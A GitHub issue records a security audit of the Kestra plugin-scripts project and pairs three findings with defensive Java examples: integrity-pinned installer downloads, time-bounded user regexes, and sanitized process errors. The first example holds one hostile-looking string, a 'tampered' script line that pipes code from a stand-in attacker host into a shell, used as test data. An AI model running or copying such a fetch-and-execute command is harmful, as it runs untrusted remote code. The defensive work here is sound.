
[Security Audit] Security hardening for plugin-scripts #388

Description

@fdelbrayelle

Summary

Security audit of plugin-scripts against OWASP Top 10 (2025), CWE Top 25, OWASP ASVS Level 1, Kestra Plugin-Specific Threats (KPS), and Supply Chain Dependency Hygiene.

Audit date: 2026-06-30
Auditor: AI-assisted scan (kestra-plugin-security-auditing skill)
Scope: 19 submodules, 58 Java source files

Findings Overview

HIGH (tracked as sub-issues)

  • HIGH-001 — Remote installer script executed without integrity verification (PythonDependenciesResolver.java:292)
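
The usual fix for a finding like HIGH-001 is to stop piping a remote script straight into a shell and instead download it to memory, check its SHA-256 against a digest pinned in the plugin, and only then write and execute it. The following Java 17 class is an added illustration of that pattern; it is not the project's code and does not reproduce the real call at `PythonDependenciesResolver.java:292`. The class name, the installer bytes in `main`, and the temp-file layout are assumptions for the example; the HTTPS fetch is present but `main` runs entirely offline on constructed data.

```java
import java.io.IOException;
import java.net.URI;
import java.net.http.HttpClient;
import java.net.http.HttpRequest;
import java.net.http.HttpResponse;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.attribute.PosixFilePermissions;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;
import java.util.HexFormat;

/** Added example: fetch an installer script and refuse to run it unless its SHA-256 matches a pinned digest. */
public final class VerifiedInstallerFetch {

    /** Thrown when the downloaded bytes do not match the pinned digest. */
    public static final class IntegrityException extends IOException {
        public IntegrityException(String message) { super(message); }
    }

    public static byte[] sha256(byte[] data) {
        try {
            return MessageDigest.getInstance("SHA-256").digest(data);
        } catch (NoSuchAlgorithmException e) {
            throw new IllegalStateException("SHA-256 is mandatory in every JRE", e);
        }
    }

    /** True only when the digest of {@code body} equals {@code expectedHex}; the comparison is constant-time. */
    public static boolean digestMatches(byte[] body, String expectedHex) {
        byte[] expected = HexFormat.of().parseHex(expectedHex);
        return MessageDigest.isEqual(expected, sha256(body));
    }

    /**
     * Downloads {@code scriptUri} (HTTPS only; redirects never downgrade to HTTP) and writes it to an
     * owner-only temp file, but only after the digest check passes. The caller then executes the path.
     */
    public static Path fetchVerified(URI scriptUri, String expectedHex) throws IOException, InterruptedException {
        if (!"https".equalsIgnoreCase(scriptUri.getScheme())) {
            throw new IOException("installer must be fetched over https, got: " + scriptUri);
        }
        HttpClient client = HttpClient.newBuilder()
            .followRedirects(HttpClient.Redirect.NORMAL) // follows redirects except HTTPS -> HTTP
            .build();
        HttpRequest request = HttpRequest.newBuilder(scriptUri).GET().build();
        HttpResponse<byte[]> response = client.send(request, HttpResponse.BodyHandlers.ofByteArray());
        if (response.statusCode() != 200) {
            throw new IOException("unexpected HTTP status " + response.statusCode() + " for " + scriptUri);
        }
        byte[] body = response.body();
        if (!digestMatches(body, expectedHex)) {
            // Fail closed: an upstream change (benign or malicious) must be a deliberate digest bump in the plugin.
            throw new IntegrityException("installer digest mismatch for " + scriptUri
                + ": expected " + expectedHex + ", got " + HexFormat.of().formatHex(sha256(body)));
        }
        // The script touches disk only after verification; permissions are POSIX owner-only.
        Path script = Files.createTempFile("installer-", ".sh",
            PosixFilePermissions.asFileAttribute(PosixFilePermissions.fromString("rwx------")));
        Files.write(script, body);
        return script;
    }

    /** Offline demonstration on constructed data: a "known good" script, then a tampered copy. */
    public static void main(String[] args) {
        byte[] knownGood = "#!/bin/sh\necho installing\n".getBytes(StandardCharsets.UTF_8);
        // In a real plugin this digest is a constant recorded alongside the pinned installer version,
        // obtained from the release, not from the same host the script is downloaded from at runtime.
        String pinned = HexFormat.of().formatHex(sha256(knownGood));

        byte[] tampered = "#!/bin/sh\ncurl -s https://attacker.invalid/x | sh\n".getBytes(StandardCharsets.UTF_8);

        System.out.println("known-good passes: " + digestMatches(knownGood, pinned));
        System.out.println("tampered passes:   " + digestMatches(tampered, pinned));
    }
}
```

Two caveats worth keeping in mind when applying this to the real resolver: the pinned digest only protects you if the URL also points at a fixed installer version rather than a moving "latest" endpoint, and the digest constant has to come from a source independent of the download host (the upstream release page or a checksum recorded at plugin build time), otherwise an attacker who controls the host controls both the script and its expected hash.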

MEDIUM (no sub-issue — remediate during next sprint)

  • MEDIUM-001 — User-controlled regex compiled without ReDoS timeout in 7 of 9 trigger implementations (Shell, Python, Node, Go triggers)
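
`java.util.regex` has no native match timeout, so the standard mitigation for MEDIUM-001 is to bound the pattern and input sizes and to hand the matcher a `CharSequence` whose `charAt` checks a deadline: catastrophic backtracking keeps re-reading characters, so the deadline check fires inside the engine and aborts the match. The following class is an added example of that technique, not code from the plugin-scripts triggers; the limits, class names and the pathological pattern in `main` are assumptions chosen for illustration.

```java
import java.util.concurrent.TimeUnit;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
import java.util.regex.PatternSyntaxException;

/** Added example: compile a user-supplied regex and evaluate it under a wall-clock budget. */
public final class BoundedRegex {

    /** Thrown when a single match attempt exceeds its time budget. */
    public static final class RegexTimeoutException extends RuntimeException {
        RegexTimeoutException(String message) { super(message); }
    }

    /** CharSequence wrapper that aborts the matcher once the deadline has passed. */
    private static final class DeadlineCharSequence implements CharSequence {
        private final CharSequence inner;
        private final long deadlineNanos;

        DeadlineCharSequence(CharSequence inner, long deadlineNanos) {
            this.inner = inner;
            this.deadlineNanos = deadlineNanos;
        }

        @Override public char charAt(int index) {
            // Overflow-safe comparison; nanoTime() is cheap relative to a backtracking step.
            if (System.nanoTime() - deadlineNanos > 0) {
                throw new RegexTimeoutException("regex evaluation exceeded its time budget");
            }
            return inner.charAt(index);
        }

        @Override public int length() { return inner.length(); }

        @Override public CharSequence subSequence(int start, int end) {
            return new DeadlineCharSequence(inner.subSequence(start, end), deadlineNanos);
        }

        @Override public String toString() { return inner.toString(); }
    }

    // Assumed limits: tune per trigger. Compile-time cost is linear in pattern length, match-time
    // cost is bounded by the deadline below, so these mainly cap memory and log volume.
    static final int MAX_PATTERN_LENGTH = 512;
    static final int MAX_INPUT_LENGTH = 64 * 1024;

    /** Compiles a user-controlled pattern, rejecting oversized or syntactically invalid input up front. */
    public static Pattern compileUserPattern(String userRegex) {
        if (userRegex == null || userRegex.length() > MAX_PATTERN_LENGTH) {
            throw new IllegalArgumentException("regex missing or longer than " + MAX_PATTERN_LENGTH + " characters");
        }
        try {
            return Pattern.compile(userRegex);
        } catch (PatternSyntaxException e) {
            // Surface only the engine's description, not a stack trace, to the flow author.
            throw new IllegalArgumentException("invalid regex: " + e.getDescription());
        }
    }

    /** Runs {@code pattern.matcher(input).find()} but gives up after {@code timeoutMillis}. */
    public static boolean findWithin(Pattern pattern, CharSequence input, long timeoutMillis) {
        if (input.length() > MAX_INPUT_LENGTH) {
            throw new IllegalArgumentException("input longer than " + MAX_INPUT_LENGTH + " characters");
        }
        long deadline = System.nanoTime() + TimeUnit.MILLISECONDS.toNanos(timeoutMillis);
        Matcher matcher = pattern.matcher(new DeadlineCharSequence(input, deadline));
        return matcher.find();
    }

    /** Demonstration on a constructed pathological pattern and a harmless one. */
    public static void main(String[] args) {
        String input = "a".repeat(40) + "b"; // constructed: many 'a's followed by a non-matching tail
        Pattern evil = compileUserPattern("(a+)+$"); // exponential backtracking on the input above
        try {
            findWithin(evil, input, 200);
            System.out.println("evil pattern finished (unexpected)");
        } catch (RegexTimeoutException e) {
            System.out.println("evil pattern rejected: " + e.getMessage());
        }
        Pattern benign = compileUserPattern("^a+b$");
        System.out.println("benign pattern matches: " + findWithin(benign, input, 200));
    }
}
```

The deadline is per match attempt, so a trigger that evaluates the same pattern against many lines should either share one deadline across the batch or keep the per-call budget small; and because the check lives in `charAt`, a pattern that loops without consuming input is not covered, which is why the length caps stay in place alongside the timeout.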

LOW (no sub-issue — address opportunistically)

  • LOW-001 — Process exception messages forwarded into thrown exceptions without filtering (6 locations in PackageManagerType.java and PythonDependenciesResolver.java)
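
For LOW-001 the practical remedy is to keep the full tool output in the task's own log stream, where operators expect it, and to put only a sanitized, truncated summary in the exception that propagates to the UI and API. The following class is an added example of such a sanitizer, not code from `PackageManagerType.java` or `PythonDependenciesResolver.java`; the redaction patterns, the length limit and the sample stderr in `main` are assumptions constructed for the demonstration.

```java
import java.util.regex.Pattern;

/** Added example: turn raw package-manager stderr into an exception message safe to surface. */
public final class ProcessErrorSanitizer {

    /** Assumed cap; long tool output belongs in logs, not in an exception message. */
    static final int MAX_MESSAGE_LENGTH = 512;

    private static final Pattern ANSI_ESCAPE = Pattern.compile("\u001B\\[[0-?]*[ -/]*[@-~]");
    /** Control characters other than newline and tab, which would otherwise let output forge log lines. */
    private static final Pattern CONTROL_CHARS = Pattern.compile("[\\p{Cntrl}&&[^\\n\\t]]");
    /** user:password@ in URLs such as private package indexes. */
    private static final Pattern URL_CREDENTIALS =
        Pattern.compile("(?i)([a-z][a-z0-9+.-]*://)[^/\\s:@]+:[^/\\s@]+@");
    /** Anything following a secret-looking key on the same line is dropped (deliberately conservative). */
    private static final Pattern SECRET_ASSIGNMENT =
        Pattern.compile("(?i)\\b(token|password|passwd|secret|api[_-]?key|authorization)(\\s*[=:]\\s*)[^\\r\\n]+");

    public static String sanitize(String raw) {
        if (raw == null) {
            return "";
        }
        String s = ANSI_ESCAPE.matcher(raw).replaceAll("");
        s = CONTROL_CHARS.matcher(s).replaceAll("");
        s = URL_CREDENTIALS.matcher(s).replaceAll("$1[redacted]@");
        s = SECRET_ASSIGNMENT.matcher(s).replaceAll("$1$2[redacted]");
        if (s.length() > MAX_MESSAGE_LENGTH) {
            s = s.substring(0, MAX_MESSAGE_LENGTH) + "...[truncated]";
        }
        return s;
    }

    /** Exception type the resolver would throw; the message is already sanitized when constructed. */
    public static final class PackageInstallException extends Exception {
        public PackageInstallException(String tool, int exitCode, String rawStderr) {
            super(tool + " exited with code " + exitCode + ": " + sanitize(rawStderr));
        }
    }

    /** Demonstration on constructed stderr that mixes colour codes, an index URL with credentials and a token. */
    public static void main(String[] args) {
        String constructedStderr =
            "\u001B[31mERROR\u001B[0m: HTTP 401 for https://deploy:hunter2@pypi.internal.example/simple/\r\n"
            + "token=ghp_example1234 was rejected by the index\n"
            + "Collecting requests ... " + "x".repeat(600);

        PackageInstallException e = new PackageInstallException("pip", 1, constructedStderr);
        System.out.println(e.getMessage());
    }
}
```

The redaction list is a floor, not a complete filter: package managers also print local paths and environment details, so the full raw output should only ever be written where the plugin already writes tool logs, and the exception message should be treated as something that may end up in an API response.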

Acceptance Criteria

  • All CRITICAL sub-issues resolved and merged (none in this audit)
  • All HIGH sub-issues resolved and merged
  • MEDIUM/LOW findings triaged: accepted, deferred with rationale, or fixed
  • Follow-up scan scheduled within 90 days

Standards


Metadata

Labels: area/plugin (Plugin-related issue or feature request), kind/security (Security-related issue)
Type: Epic